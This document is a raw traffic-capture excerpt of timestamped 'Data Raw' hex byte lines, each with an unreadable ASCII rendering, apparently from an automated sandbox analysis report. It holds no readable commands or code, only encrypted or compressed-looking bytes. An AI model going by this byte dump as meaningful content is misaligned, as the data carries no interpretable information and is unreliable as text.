                                                                                                                                                    2022-09-29 12:59:14 UTC21927INData Raw: ad 64 fa ac a4 31 5a c9 3c 62 83 4c 1d 2e ab f9 27 19 ce 7c 0e 73 90 92 9c 29 3e 54 ec ef fa b3 82 73 93 e0 3d 28 ed 26 5c dc 9c b1 1c 09 b1 79 c9 42 23 92 b1 3f 2f ba f3 c3 dd 9d d7 34 16 e0 b9 6b a2 f6 9e 58 be 71 27 9d 2b ad ff f4 49 5e 9e 07 a1 ba 36 87 7d bc 61 c7 86 1f 50 18 e2 85 4d 4f ea 29 10 23 bf aa e6 dd 84 7b cd 17 70 91 25 50 34 ab 19 00 b5 06 14 e3 3e b1 0c 86 9c 78 f1 91 81 f3 fb 6d 51 30 73 74 bf fb 53 7e 75 9d 3a c9 aa da 52 02 4c 62 be c8 e5 2c 03 d9 36 7f 4e cc aa d6 42 a6 cb 5e e5 bb 54 84 b0 d7 e7 7d 5a 75 d6 46 9f e2 38 d0 35 30 4c 7a 5c 16 ad 35 79 35 37 4c 83 1d f3 12 b8 9f b5 af d3 ae 46 f1 dc 36 d2 08 46 d0 10 1d 48 9e dd f8 c8 1b a0 f2 43 60 87 c2 47 f4 b5 d8 4f 8f b7 0f cd d9 51 a1 1b 61 0d f0 67 a7 35 3d b6 26 25 c8 4b 0b 0b
                                                                                                                                                    Data Ascii: d1Z<bL.'|s)>Ts=(&\yB#?/4kXq'+I^6}aPMO)#{p%P4>xmQ0stS~u:RLb,6NB^T}ZuF850Lz\5y57LF6FHC`GOQag5=&%K
                                                                                                                                                    2022-09-29 12:59:14 UTC21943INData Raw: e8 50 b7 df 6e fd 17 45 10 73 f4 c6 78 33 7f fe 9c 17 e5 02 49 4a 85 e3 e0 a7 3f 43 91 d3 f6 42 fd 7d ac 60 82 9c 48 ea d7 3c 4d f1 96 35 c4 15 8b 75 29 c0 78 9d 6f 41 98 e7 01 a2 87 95 ca ea e9 4f 66 06 e8 ec 2c 8b 02 e5 6c 7c 0c 2a 0c 01 22 e4 e5 8f 3f dc d4 f6 7e 3e 12 ac 70 4e e0 ae c2 e1 50 85 d8 28 53 35 3b de 52 36 2a 8e 91 fe 87 7e a7 ca 2b 7e e8 96 85 86 87 79 b6 3d 89 60 97 48 03 e6 fa fc ba 1f c5 66 81 d9 bb a4 77 25 e5 e9 cf 2a e5 14 bb ab 17 60 6b 2a d8 2f 85 12 58 1c 1a 35 2f 7f b5 3c 7f f0 8e ab 88 8f 43 2c fb 74 43 c8 06 de ba ce ec aa 4a e7 7e 63 23 98 23 75 13 60 47 f3 38 c7 23 98 ce 88 82 b3 9c 18 67 d2 88 1f d2 c1 37 4b 2a b2 59 8c ad e1 12 18 ec e6 57 e6 6d 27 e6 90 d0 3e 31 25 7c 36 54 10 16 e2 f8 3b d9 4b a3 5a c5 d9 e1 76 82 04 a5
                                                                                                                                                    Data Ascii: PnEsx3IJ?CB}`H<M5u)xoAOf,l|*"?~>pNP(S5;R6*~+~y=`Hfw%*`k*/X5/<C,tCJ~c##u`G8#g7K*YWm'>1%|6T;KZv
                                                                                                                                                    2022-09-29 12:59:14 UTC21959INData Raw: 09 9b 48 41 aa 1e 5d 74 c0 0f 83 94 89 3e 25 bb 21 ea 8e 6c 59 70 93 53 90 e4 d4 0d ad 6e 4b 76 17 45 aa a9 56 27 1f e2 5b 48 ac 87 6d 8b 07 e5 d8 24 fc 89 7c 8f db 92 60 4e 4d 35 5e cf e7 4a 67 ea 2c 81 7a 68 3c c3 75 07 fc 13 fe 13 0a fa 2a 76 21 9e 18 3b c0 b4 c6 a2 dd f8 7c fe 25 71 ef 6a 43 ec 09 c9 48 1c 26 e4 88 be 5c 8b a7 8d 35 93 94 1a fd 14 09 fc 05 d5 99 dd c2 b3 43 44 06 35 b8 60 43 16 da b9 df 82 79 72 73 05 53 f5 28 79 0a c5 07 29 49 76 7e 9e 2c ee 55 fe bc 09 07 d3 5e 4a 2b f0 a1 ed 47 1d 0e c3 cf 3e 3a 28 ec 17 c4 16 08 ff c2 bd 59 28 2e 18 26 7a f2 fa 82 39 3c d1 f3 2a ce 66 cd 88 0b 7f af b0 e4 78 df 3e c3 b3 55 34 fc 55 6a 5b 09 58 bc a5 fe 23 a9 5c 77 d5 45 82 96 f5 c6 c6 62 6c 23 cc be 0d 22 87 44 fd 43 ac 7a 6f 76 dc ca 62 f4 64 a7
                                                                                                                                                    Data Ascii: HA]t>%!lYpSnKvEV'[Hm$|`NM5^Jg,zh<u*v!;|%qjCH&\5CD5`CyrsS(y)Iv~,U^J+G>:(Y(.&z9<*fx>U4Uj[X#\wEbl#"DCzovbd
                                                                                                                                                    2022-09-29 12:59:14 UTC21975INData Raw: f6 5e 4e b3 09 f2 bd aa 25 0e b0 50 34 98 97 8c a4 50 48 41 8a 24 0f 68 70 3e a6 f2 f9 75 d6 73 ad fe e3 51 13 f3 73 5c 13 ca c4 9b 6c a6 63 eb 42 57 db f1 f7 0a 29 56 1f f5 6f 8f d8 25 fc 85 02 0e 29 19 68 b5 c6 9f 14 6d d7 d7 75 c8 d8 f8 45 33 27 6d 6b 2e 0f d5 ac 1f 36 77 0d a9 83 df 7c f0 77 81 b5 db e3 4b a9 9b 6f d3 99 d6 ff 88 0d dc a8 67 af 97 4d 5a c0 2a 61 13 fe be 04 e8 73 07 fa a9 49 ac da a3 90 da 3b 1d 14 12 59 f6 04 7e d9 9a 78 f6 0a 50 9d 23 98 fc 7b a7 51 41 84 17 34 f2 af 06 f6 8e 33 67 d8 28 45 4a 4e 4f 52 c7 91 cf 84 0c 74 69 e6 c2 8e 96 61 cb e5 6a 0b 87 5f 66 83 d7 69 9e d4 2e 11 95 7b 83 dd d8 22 09 97 60 08 2a 8a 83 64 7f a3 99 09 c0 4f ac f2 1f 88 9b 41 47 3a 2f 44 74 92 d3 89 45 d7 a2 df 10 6a f2 16 a2 47 6d 13 e9 48 e8 f2 c6 de
                                                                                                                                                    Data Ascii: ^N%P4PHA$hp>usQs\lcBW)Vo%)hmuE3'mk.6w|wKogMZ*asI;Y~xP#{QA43g(EJNORtiaj_fi.{"`*dOAG:/DtEjGmH
                                                                                                                                                    2022-09-29 12:59:14 UTC21991INData Raw: a1 a4 55 78 87 56 17 31 a1 ed 0e 8c e4 77 07 28 07 14 3e ec aa 81 93 30 e8 b0 89 9e c0 09 b9 db 1f d6 ee 91 0c ca 04 16 c8 14 12 07 37 c9 6f 47 5d 3a 4c 69 94 a1 80 8a d1 73 48 5b 78 f1 e9 5b 8c 32 f1 71 9f c6 d8 b0 c0 9d ea c1 07 1f dc f9 07 4a e3 f8 cc 4b 75 59 ab 08 ae c2 1f 1b 53 49 b4 df 80 be df 63 71 22 ff 02 3e 3d c0 da a8 f2 7d 2c ba a6 49 db 9d 81 9a be 39 a5 48 ef bd bb 82 20 37 4c 89 b5 68 41 34 bd 62 44 86 77 2d 68 17 f8 e0 c9 a0 43 89 7a 1c 8f 86 12 c3 5c 3a 69 cf e8 1e e6 d5 85 c4 04 be ab a5 13 32 16 ea a6 2f c3 1e 06 cf 60 f0 2f e5 99 ba 06 a0 c5 22 2e f6 c9 07 39 31 20 07 13 a6 ae e3 70 2d 1f 0f 14 10 51 ac f8 05 49 de e1 37 a6 4e b6 c5 ce 65 c5 c6 4f 4b 6f c8 cb e5 bc 3e 2d 2e 22 59 a0 0f 34 37 11 6e ef 3e a6 97 40 2a ff 29 aa 14 cd 68
                                                                                                                                                    Data Ascii: UxV1w(>07oG]:LisH[x[2qJKuYSIcq">=},I9H 7LhA4bDw-hCz\:i2/`/".91 p-QI7NeOKo>-."Y47n>@*)h
                                                                                                                                                    2022-09-29 12:59:14 UTC22007INData Raw: 5d 04 21 aa 00 2e d0 f0 67 1e a9 e2 dc 95 da c0 db 2b 61 53 c2 25 92 2d 04 1a a2 2f 49 7a 39 5f e6 70 cd fb 06 40 1f 01 86 b9 29 7c 76 ca 7a 57 ba 8e 0a 19 48 9c 37 27 48 d3 d5 56 c2 ab db ab 0b 02 66 0a 1b 4c 75 71 be 00 01 fe 65 ca cf 53 6d ea 2d da 74 c2 e8 26 d4 30 0f 54 09 dc a4 ea 26 c6 56 ad 71 6e f1 e3 d0 8c 54 8a 1f e4 95 3d 90 49 38 19 94 e4 1a 52 2b 33 76 17 d2 50 20 1f 45 dc 8c 2d 89 d8 0d 1e 53 82 d2 dd 21 8e 90 b7 cf e9 59 9e 23 65 6a 88 88 26 14 f5 26 85 1b 32 42 1d 1d cf e4 a2 b8 ff 44 cf ca 97 c8 d4 70 11 e2 39 66 1f ab 98 c5 f1 19 ea 86 25 b0 91 b8 a2 d6 7a ee 7e 13 d5 e3 61 7c 9a b0 34 d3 ce a0 e9 7b f6 d5 8d f4 bf 63 8b 51 63 e2 6d 8f 71 85 1b 48 af 06 82 69 51 f2 ba 58 ff 4b d5 29 16 b5 03 a4 2b 06 a9 33 fb 92 e3 88 29 91 f9 07 16 51
                                                                                                                                                    Data Ascii: ]!.g+aS%-/Iz9_p@)|vzWH7'HVfLuqeSm-t&0T&VqnT=I8R+3vP E-S!Y#ej&&2BDp9f%z~a|4{cQcmqHiQXK)+3)Q
                                                                                                                                                    2022-09-29 12:59:14 UTC22023INData Raw: 2b 58 a9 11 c0 1b 13 2d 71 25 4d e0 ae c3 df 1d 91 9f 60 81 5f 95 19 f9 d4 a9 94 d2 a4 62 0c e2 63 9f b6 59 e6 dd 2d 00 4b 3d 1c 10 19 04 df 57 9f 30 b1 46 8d 6b b7 d8 54 31 42 da 5a e6 a7 69 a4 83 5c 88 58 6b 4a 9f 3b e7 2f 2e d7 be ee e0 01 aa 84 ae 09 a7 6d 7e 22 5b 80 b0 f5 35 81 52 1a 76 b5 a3 95 d5 5d 33 2b 02 0f 77 49 78 b5 08 db f4 cf 4e cd 3f 49 e8 be 36 69 cf d0 9b 53 0b bc 98 9d b6 e4 f3 d9 7c fd ca f6 10 34 89 c1 91 79 60 84 be 95 e3 c0 39 7b df cc e3 a3 fe 90 7b 98 54 f8 0d 88 d4 e0 b2 0b dd 61 90 14 4b b5 05 c8 fd 53 aa 21 f5 5e 6f a1 a9 b5 5a d5 79 41 52 60 d8 1e a3 75 ec 7a ad d8 33 c5 2f 3b fe 1d 6c 5d 7b a9 d8 3e 97 7d 29 7a b9 ef 97 93 6a 1e d5 ca 30 b5 9b cb 7d 6d 7e b5 f2 19 52 da bd ea 16 e2 dd 2c 24 d5 d5 a7 03 70 da 60 88 09 ea a7
                                                                                                                                                    Data Ascii: +X-q%M`_bcY-K=W0FkT1BZi\XkJ;/.m~"[5Rv]3+wIxN?I6iS|4y`9{{TaKS!^oZyAR`uz3/;l]{>})zj0}m~R,$p`
                                                                                                                                                    2022-09-29 12:59:14 UTC22039INData Raw: 35 f0 44 59 54 07 0f 2f c9 11 bf a4 d2 b6 08 6c 78 3e cf 85 c7 38 33 2d 7d dc 0d f7 64 8c 28 68 12 e2 12 b1 e6 f4 8c bf 61 57 2d a2 d4 45 20 1e 92 26 4f ec 15 64 d8 a7 69 71 17 c7 67 68 b3 4b 05 4a 82 12 6c ad d3 89 37 d9 c5 60 70 13 9f 6b b6 3f 1a c5 a8 07 58 87 f0 24 df a6 5a 9c 30 83 c8 76 39 9a 2b ce f4 94 a0 cc 52 d8 6c 50 56 cc 62 b8 5b eb 99 88 4c e5 bc 85 11 fb b7 68 1f 3b cd e5 de a5 d2 2c 6c 04 7d 05 0a a4 06 c6 fe 05 12 73 4a 47 a8 af f0 a6 5b 68 69 41 4c 57 1c 58 81 a3 7a d4 12 62 91 9c 30 52 60 f8 b5 4f 8b f8 8e 51 7b ae 75 77 eb 05 9f b0 e1 b8 c0 17 9b 96 e6 2c d8 aa bd a2 ab c6 a8 a2 d8 73 b7 88 01 4f 8a 8f ad f6 12 7b 03 a7 66 f6 cd 48 ce d2 29 9b 5c d7 3a 31 ff 8f 17 4a 4f 64 eb 60 d7 42 a1 83 bc 31 56 08 6f 88 94 42 2d a0 9b 02 5f b1 51
                                                                                                                                                    Data Ascii: 5DYT/lx>83-}d(haW-E &OdiqghKJl7`pk?X$Z0v9+RlPVb[Lh;,l}sJG[hiALWXzb0R`OQ{uw,sO{fH)\:1JOd`B1VoB-_Q
                                                                                                                                                    2022-09-29 12:59:14 UTC22055INData Raw: 02 70 98 7d 9b 92 a4 46 61 28 99 25 94 e8 a7 4e 0f 9b 07 f0 99 21 9f e6 64 1f dc 52 75 9c 73 2b 8a 47 a5 ef 97 7b 6a 72 2a cc 95 0e 56 75 24 18 b4 85 10 1c e8 c2 32 bf 05 d7 a7 7f 60 e9 2a c2 50 2e fe e9 6b 16 d2 0a 31 4a 10 de 1b 14 13 17 e9 bd 40 ec b6 0d b2 0a ca 7b 0d 29 a1 b1 52 c3 62 c3 2c 9b 6e 07 9c 25 d4 2b 1d 6f 6e 8c 55 ef aa 90 23 e6 da da 38 2b 9e f6 5c 7a b2 13 cd 11 64 15 f5 d9 97 fb d1 b9 1b 67 47 a2 af 4c 09 93 46 a3 b2 5c 5a e4 92 4c 05 6d 64 24 f2 ae 77 2a 62 e3 ea a5 b6 08 cf 5e 4f e0 71 e0 03 f0 70 4b 36 c4 b0 ae 95 63 24 c7 ce 18 e4 ac f6 e6 07 c2 1a 21 be 2f 27 8e 48 d8 97 19 db 83 44 3a 7e 34 77 b4 3d c6 4d 1c 04 1f ea 72 d8 86 21 b8 2e 6e 79 17 4d d9 9d e6 68 0d 35 21 0f 8a 4b 24 81 85 8f 16 af 3d 80 62 db fb cf 47 ce a0 8a 4a 5e
                                                                                                                                                    Data Ascii: p}Fa(%N!dRus+G{jr*Vu$2`*P.k1J@{)Rb,n%+onU#8+\zdgGLF\ZLmd$w*b^OqpK6c$!/'HD:~4w=Mr!.nyMh5!K$=bGJ^
                                                                                                                                                    2022-09-29 12:59:14 UTC22071INData Raw: 58 11 94 de 92 63 c5 17 20 51 a4 17 82 a1 1e f0 c3 40 2f e7 f6 cd 5b 2a 02 12 0d 4e 2e 85 68 0c 53 90 9e b5 3d 22 9e d3 eb a8 0f ab 79 2e 82 2c 9b 57 e6 b0 ec 60 25 97 6e 91 3b 61 16 88 85 bc 2c 09 23 0a 76 05 a0 74 48 3b 1f a6 c1 7c 7e 62 83 e8 bd 48 b6 5d de ff 76 bf 87 26 97 2d ee b4 eb 6e 60 13 8c 3f 22 ba 75 11 1c 42 1d 95 d6 6b 98 88 b7 b8 83 90 b6 87 03 12 b5 d0 98 b7 94 e8 a7 3e 41 78 07 0d 2f 74 41 33 c5 7c f4 f4 99 d2 49 51 cf 3a fe 42 bc eb d2 e7 39 7d 8e 83 77 d0 5c 8f 02 07 0f 71 0e 60 5b ff 8f 65 2e 02 52 49 31 ca c5 5a 80 3c 9d 6d f2 aa c6 ea 5e aa 2f 67 19 03 7e ed b3 c6 44 a6 9a eb 9b bc fe 45 42 b6 a1 0b f8 c4 e6 00 6f f9 e5 ce da 6a 31 bd a4 3b c5 53 8b b5 1c 99 83 e9 02 9c 5e 9c df c0 b2 88 a2 73 18 a4 96 ee 13 f2 bd b8 5d a7 cd ad 94
                                                                                                                                                    Data Ascii: Xc Q@/[*N.hS="y.,W`%n;a,#vtH;|~bH]v&-n`?"uBk>Ax/tA3|IQ:B9}w\q`[e.RI1Z<m^/g~DEBoj1;S^s]
                                                                                                                                                    2022-09-29 12:59:14 UTC22087INData Raw: 00 06 17 24 5e b8 8d 0e 8a d5 c8 46 dd 1f 29 ee 9f 4b c6 6e 78 72 7d f9 07 ee 2d 4f 41 b5 bb 31 15 27 a1 2e b5 1a c9 6e a9 8b f7 a3 01 08 4c 2c d2 94 c5 02 d8 80 a7 36 bb 7e 61 47 8a 99 87 c3 c6 8e db da d5 06 2f 11 7f b3 ca 93 27 da 4b 8d 07 1f 29 09 58 f7 35 e5 9e 1a bc c6 4f c4 b0 9c 71 82 f0 c2 84 e8 24 07 51 5e 20 a8 74 61 c1 a3 0d 7e 2a d4 e7 ae 25 9a d2 b2 88 0b 5e 49 d9 38 6f 66 62 be 47 2d 5e bc 83 1b 12 b2 18 a5 9a 59 89 67 a4 82 6a 45 ea b1 1a 41 35 c5 b6 8b c0 91 a6 43 2e cd 14 e9 5c cc 4b 9d 75 fb 2c d5 26 6d e0 65 51 ca 3b df f6 63 2b 7a 4d 4c 83 f9 6f a0 c3 69 d6 25 17 a5 17 6a 03 ec 15 71 75 05 63 b2 d6 8b a2 da 66 0c c4 6c bb d6 39 f9 94 1e 64 bf ee f7 be 42 33 dc d2 49 de 9e 4b 74 cc d7 66 b9 30 de 27 22 3b c3 6c c9 bc c0 d4 e4 41 2c 53
                                                                                                                                                    Data Ascii: $^F)Knxr}-OA1'.nL,6~aG/'K)X5Oq$Q^ ta~*%^I8ofbG-^YgjEA5C.\Ku,&meQ;c+zMLoi%jqucfl9dB3IKtf0'";lA,S
                                                                                                                                                    2022-09-29 12:59:14 UTC22103INData Raw: 16 75 91 ce 93 0b 62 7b dd 95 6b 28 6a eb 6f bb 4b 0b 5e 6b b0 2a 87 2c c7 6d de c5 c7 33 32 d4 4a c2 fb d3 15 fe 5d fd 97 02 87 30 88 96 41 3c 03 26 ef 14 83 0c dc de d9 be 7d ab 2b 50 f7 e4 2e 0c 8c b8 a9 39 af b2 c3 6d e3 34 af 7d 09 31 a5 a5 15 1d 96 bf f2 d2 46 90 36 01 b4 14 e6 20 1b 41 9e 5b f3 cc 32 78 45 c7 01 ae 51 9a 17 ec 3f 35 41 47 b8 54 b6 ac 12 e6 9a 7c 4a d9 59 e5 83 af 85 de b9 9e 35 e6 dc 27 d2 fd 24 47 7a 96 c9 56 34 5b 44 7e a5 b9 02 c6 15 d5 b0 80 f0 3f e8 3b 3e 42 8a fd ce e2 9a cd bd 0e 5f 7a 99 e0 64 ec 77 03 c1 db 20 e4 8b 20 66 ba 4a 34 6b d6 f3 25 8d a7 bb f8 46 f6 1a 59 58 72 2d 89 af 19 e0 34 2e 70 35 29 c6 14 b5 4c a0 c3 f3 65 86 b5 27 0e 2e 9c 42 90 b7 10 2b 2b 85 fa 3b bd 52 bf 10 fa 26 db 2a eb 51 d8 4b 57 36 e0 f7 34 be
                                                                                                                                                    Data Ascii: ub{k(joK^k*,m32J]0A<&}+P.9m4}1F6 A[2xEQ?5AGT|JY5'$GzV4[D~?;>B_zdw fJ4k%FYXr-4.p5)Le'.B++;R&*QKW64
                                                                                                                                                    2022-09-29 12:59:14 UTC22119INData Raw: aa bf a4 10 a7 cc 77 cf 25 ea 9b eb 6b bf 49 d9 83 07 1a 57 2b f6 84 53 40 d0 58 23 a7 36 ff 56 12 41 de a9 a7 24 f2 ca bd db 45 d7 55 a1 6d 25 99 7c 2f ee 97 41 0a fd 17 8b ec 43 02 27 eb b3 5d 66 0b a2 08 60 36 03 76 1e f0 8b 81 8a a7 5d 67 14 b8 cd 55 61 05 70 ab 3a f9 50 6e d9 dc 9a 81 36 88 fb ea fe 21 30 72 ab 95 c5 c9 b6 86 1c 5a 67 61 b5 30 67 2b 32 14 a5 ba a3 39 ed c8 13 46 68 07 95 c9 68 8a 2d ee 91 48 8c 2c e4 7f 2a 60 2a bd 47 28 21 81 ad 1f 9b 6d ec 59 cd 80 28 16 c7 7c 5d 81 ac 68 d3 59 19 43 0a 31 f2 f0 d4 ab c4 e1 02 8e 49 10 87 ea f0 67 d4 4a 81 7a 2e 58 5f be cf 03 1d 2e 77 8a d2 ec b6 61 3f 19 47 78 54 0e db de 44 6f 9e e7 a4 53 3d 2c 3d 5a 91 54 27 bb b9 5d 8d 1c 18 0b 6f 28 7b ad 95 65 55 f6 84 28 ef eb d9 95 18 a5 78 52 a4 a3 d5 3d
                                                                                                                                                    Data Ascii: w%kIW+S@X#6VA$EUm%|/AC']f`6v]gUap:Pn6!0rZga0g+29Fhh-H,*`*G(!mY(|]hYC1IgJz.X_.wa?GxTDoS=,=ZT']o({eU(xR=
                                                                                                                                                    2022-09-29 12:59:14 UTC22135INData Raw: 4c 3f cf d3 fe 52 10 ca e5 27 99 eb 2c 9b b6 9f c7 37 95 ef 02 4d 3c c5 7a 97 c6 09 28 49 78 02 85 35 b6 0f de e8 96 31 dd 90 73 f3 c3 e0 fa 30 c7 14 37 47 9b a4 20 f8 70 65 b2 6e c5 38 c5 f0 7a 75 40 31 08 44 37 67 96 c1 d0 83 af 07 f6 a1 57 6c cf f6 32 bc 79 3c ec e5 68 0f 0e 78 72 dd 1a 3e 49 b9 58 50 ba 52 e4 ad 8e c4 cc 3d 68 26 b7 7c e1 e3 95 57 27 d7 7c b8 9c 58 ce a2 fc ae 44 d3 57 f3 33 39 87 40 aa 39 0c 1d e0 76 e3 5f 87 3a c0 6b 5c bd 48 81 2b a8 e4 d3 32 75 2b 9f 0a 93 3b b3 8f b6 25 3f cd 8d e3 c4 22 28 38 43 6d cd e8 18 9f 65 94 77 2a 64 bd 2d 62 3f 9d 48 ae 9c 26 77 be 6b fa 99 78 09 c5 30 0c 75 af 43 e0 5a b2 44 87 81 bd f6 cb be b8 a7 d0 21 2d 62 54 2f 3c fb f1 a2 85 b4 74 c5 7c 88 ef b1 bd 03 fb 7b 07 8e bf fd 4a 49 80 48 df de 00 ca cd
                                                                                                                                                    Data Ascii: L?R',7M<z(Ix51s07G pen8zu@1D7gWl2y<hxr>IXPR=h&|W'|XDW39@9v_:k\H+2u+;%?"(8Cmew*d-b?H&wkx0uCZD!-bT/<t|{JIH
                                                                                                                                                    2022-09-29 12:59:14 UTC22151INData Raw: 09 bb ca 98 27 90 0f 21 31 4e 89 98 a2 64 bb 91 76 11 ff 7e b0 3c 77 59 d5 e9 25 53 5b 64 92 9c f8 86 78 52 3d 57 43 77 08 eb f0 74 57 a2 fe 82 25 ef ea db 51 56 c9 d1 df 9d bb 07 43 7d dd 44 88 5f 2c 27 e3 da c1 93 1c 68 ad 2d d9 36 ae d0 e6 48 b6 a2 29 c9 c2 6e 05 e1 35 a7 f1 75 b7 fc 04 f9 a3 ef 41 34 2e 5a 84 d9 38 e0 a3 e2 96 85 b7 47 0f 82 c7 96 6f 87 00 b9 c6 96 5e 64 8a 4d c8 69 86 25 7b d0 a9 b6 9c 86 4f 27 0f f5 b5 90 67 d6 47 e9 ef 2d fe 3b f7 ba 44 81 c7 f8 a1 c5 84 85 83 76 1c 55 33 cc c6 bb 26 75 8f 55 16 d2 bb 8d c0 08 56 49 79 41 75 87 f1 33 37 a4 fa 47 36 42 7b b2 21 d0 8a dd 26 46 38 a8 78 d0 08 57 87 18 e8 45 76 52 13 a8 48 e4 c8 ee 01 5e 5f a0 58 6b db 93 6a 77 60 9a 95 67 cc 10 8b 60 82 7d 95 dc de b3 c8 35 68 44 c7 2f 36 bb 62 e5 77
                                                                                                                                                    Data Ascii: '!1Ndv~<wY%S[dxR=WCwtW%QVC}D_,'h-6H)n5uA4.Z8Go^dMi%{O'gG-;DvU3&uUVIyAu37G6B{!&F8xWEvRH^_Xkjw`g`}5hD/6bw
                                                                                                                                                    2022-09-29 12:59:14 UTC22167INData Raw: c5 78 2e a1 d1 f3 21 85 13 33 fe 94 99 0e ba d9 cd e2 1e 36 06 4c 07 71 99 84 84 0b 6b bc 0c 21 3b c9 c8 8c 07 74 67 bd da 81 d9 15 8e 96 c3 3a c3 36 07 c1 d2 e3 dd 0f 3e 90 32 12 73 b8 88 f2 83 44 12 25 b1 9d bc 59 36 e4 0d 0b 24 95 c0 5c 08 a4 dc be 19 26 0c 60 ef 28 d2 1c 83 73 99 9a 74 cb 7c 06 44 f1 1a 25 9e 8f 7e ca 89 a7 fb 49 a0 48 15 ad 41 55 a5 d1 1d 18 db d0 80 f0 6c 23 1d 48 c7 2d e0 fc 54 6a 09 51 cf f1 f2 e2 c3 61 c5 51 54 95 0c 9a f8 f0 18 a7 02 78 12 b9 94 63 b5 87 9d fd 89 2f 4b c4 f7 fb f4 a0 36 f1 26 ba 7b 09 16 bb fb 1c 6e 3a c2 4b d7 8b 17 dc 70 44 ad ae be 54 41 df 66 62 8b 56 81 73 77 6e b5 c2 ec 14 e7 3c dd 56 31 08 d2 4e 6e 30 db f5 9b 9a 9a e2 50 ee e1 10 7e 50 bb c5 8f d4 ee 47 a0 42 9c 6a 4e 37 c2 c4 5e 6c 14 ce 5b 4b e3 b8 bb
                                                                                                                                                    Data Ascii: x.!36Lqk!;tg:6>2sD%Y6$\&`(st|D%~IHAUl#H-TjQaQTxc/K6&{n:KpDTAfbVswn<V1Nn0P~PGBjN7^l[K
                                                                                                                                                    2022-09-29 12:59:14 UTC22183INData Raw: 31 5f 06 17 c4 9c 87 04 74 f8 6f 5b 97 b8 54 4d 2a d9 35 72 dd 14 42 ee 05 f4 25 93 b1 28 23 5a a9 e7 17 a5 8a b5 55 ed 73 87 f5 e7 ba 98 b2 35 8f 7a 48 98 98 df 1b 52 6e 94 e3 c9 62 42 b2 74 0a 41 d9 99 02 66 e1 bd 95 03 08 00 4e 8e 1b fe eb 7a cf fc d7 92 92 90 53 13 02 f3 92 1f c7 08 fe 6e 38 2d 14 32 51 ea 72 7a 9b 3e 77 32 aa c8 79 f8 4a 76 eb fb 1a 2b c2 6e 81 3e 15 17 d4 44 f9 cc 57 39 73 25 16 d2 fb 04 5d dd f5 12 5d 58 4b fb 72 5d bd fe 11 3c 56 e4 dd 57 c1 11 24 d8 57 e1 f4 1b d6 e9 e8 b2 5c a7 98 58 00 77 ec 95 9f a8 8e ab 58 65 31 d5 9f 43 05 a3 32 26 26 09 39 90 7a bb d4 70 1d 88 ce 46 3c e5 32 bd da 8d 49 8a c9 b2 cd 96 f6 54 92 ac 52 14 ba b4 3b d8 a4 cc 51 b6 31 af 61 35 b8 f1 84 56 9b 95 f3 2b b8 9d 41 d5 1a 46 21 66 ee d4 42 75 a8 f4 31
                                                                                                                                                    Data Ascii: 1_to[TM*5rB%(#ZUs5zHRnbBtAfNzSn8-2Qrz>w2yJv+n>DW9s%]]XKr]<VW$W\XwXe1C2&&9zpF<2ITR;Q1a5V+AF!fBu1
                                                                                                                                                    2022-09-29 12:59:14 UTC22199INData Raw: 41 09 69 5a 5a 6f 0b ca d3 c8 40 2b d4 4c d7 66 8e bb 29 07 5d b3 2d b4 06 ab b4 68 75 94 6e ac 93 91 8c 5f c0 36 62 da 42 96 ac 1b 29 b4 b2 c7 ad 85 f8 5d e8 b7 dc 8a 05 da 28 61 1e e0 2d 2e e6 3f e0 de 57 bd c5 21 11 44 c4 e1 80 7c b2 da 7f ba b9 10 f5 6c 13 76 55 29 05 03 b7 7b 1c 76 54 2e 53 75 e1 b8 73 6f 75 2c ea 02 08 b5 a2 aa ec 27 97 cb 35 20 7c 07 91 4b 96 cc 5f 62 d0 da 1d e9 e3 b4 df e4 1c e3 90 41 ec f9 86 d7 bb 89 e4 b0 d4 1d c5 0a aa e9 86 59 6f b2 52 77 6a f0 80 e7 0a 92 13 16 05 bf 2a 92 4b a8 f8 c5 3d 4a 8f c2 b0 50 f6 88 25 91 d5 a5 82 b6 6b ec e8 25 22 80 a0 96 c4 58 08 25 52 ec 6f 54 43 57 85 36 f9 05 a6 3f af 4a 23 c2 b7 92 d8 24 57 60 9e bf 9c 1d 13 13 0d 37 40 bc c9 24 fd 98 98 e9 b6 d0 9c fb 96 18 62 94 0b 47 97 68 11 9a 26 ec 38
                                                                                                                                                    Data Ascii: AiZZo@+Lf)]-hun_6bB)](a-.?W!D|lvU){vT.Susou,'5 |K_bAYoRwj*K=JP%k%"X%RoTCW6?J#$W`7@$bGh&8
                                                                                                                                                    2022-09-29 12:59:14 UTC22215INData Raw: 3a 37 1c 80 39 07 a4 86 0e 26 ec 4d bb 27 e2 0f a3 b2 4e 93 9c 03 7b fb eb 66 ed 21 48 e2 39 c7 d2 94 dd 3e 2d df bd b9 88 c3 16 61 90 6f 6d f2 bf fa 6e fb e0 00 d9 5c 73 19 03 bc 67 86 5a 6f d3 d2 1e c4 0b 3f 4a 95 ad ad b0 96 cb 1b 89 bb 04 24 dc a4 f8 dd af 76 0b e3 d1 9b 46 a3 3e 3f 03 15 e0 cd 30 00 ac 8e 49 72 07 8b da 26 20 85 dd 08 e6 92 33 f2 1a a8 20 f1 d8 17 7d 1f c7 36 04 d0 dc f0 4c df be 1b 54 f8 e5 da 91 be 8d a3 e2 ed c9 22 fb 78 df ff 46 af 1f 9e df bc d4 8b b6 9a 42 e5 09 e2 8d 6f 39 1e a9 02 17 81 98 be b7 90 37 3b cf 44 72 2a 2a e0 f6 ee 55 33 5a b3 c3 d7 db 1d 72 c6 9e 52 2a de fb b9 79 2a 45 c5 ae c1 e3 64 f2 dc b0 28 31 33 66 7b 1a c3 22 9d d3 b5 8e f9 fa ac b3 e6 79 35 16 19 2a 97 f0 09 b5 58 33 05 73 d7 6d 17 ba c0 02 e2 d2 bb ec
                                                                                                                                                    Data Ascii: :79&M'N{f!H9>-aomn\sgZo?J$vF>?0Ir& 3 }6LT"xFBo97;Dr**U3ZrR*y*Ed(13f{"y5*X3sm
